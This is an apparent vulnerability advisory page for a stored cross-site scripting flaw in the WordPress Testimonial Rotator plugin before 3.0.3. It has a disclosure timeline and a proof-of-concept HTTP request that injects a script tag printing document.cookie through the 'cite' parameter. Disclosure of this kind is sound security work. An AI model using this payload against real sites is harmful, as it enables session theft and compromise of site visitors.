Lucene search
Vu Dong - SunSCRWPEX-ID:FAAA56B2-20A8-417A-AFF7-1CB1D8851FC1HistoryJun 17, 2020 - 12:00 a.m.
Testimonial Rotator < 3.0.3 - Authenticated Stored Cross-Site Scripting (XSS)
2020-06-1700:00:00
Vu Dong - SunSCR
22
0.001 Low
EPSS
Percentile
25.0%
A Stored XSS vulnerability has been found in the ‘Author Information’ textarea in testimonials from the plugin, which could allow an authenticated medium-privileged user (contributor+) to inject arbitrary JavaScript. The XSS will be triggered for anyone visiting public posts or testimonial page listing in the backend. The filter work by javascript, thus if user intercepts request and insert payload in “cite” parameter, the payload will be stored in the database. Edit (WPScanTeam): May 9th, 2020 - Confirmed & Escalated to WP Plugins Team May 11st, 2020 - WP Plugins Team Investigating June 16th, 2020 - v3.0.3 released, fixing the issue.
POST /wp-admin/post.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=136&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1381
Origin: http://example.com
Cookies; [SNIPPED]
Connection: close
[SNIPPED]&cite=<a href="http://google.com">http://google.com</a><script>alert(document.cookie)</script>Related
prion
prion
Cross site scripting
2020-10-16 15:15:00
wpvulndb
wpvulndb
openvas
openvas
WordPress Testimonial Rotator <= 3.0.2 XSS Vulnerability
2020-10-27 00:00:00
cve
cve
CVE-2020-26672
2020-10-16 15:15:11
patchstack
patchstack
cvelist
cvelist
CVE-2020-26672
2020-10-16 14:36:19
nvd
nvd
CVE-2020-26672
2020-10-16 15:15:11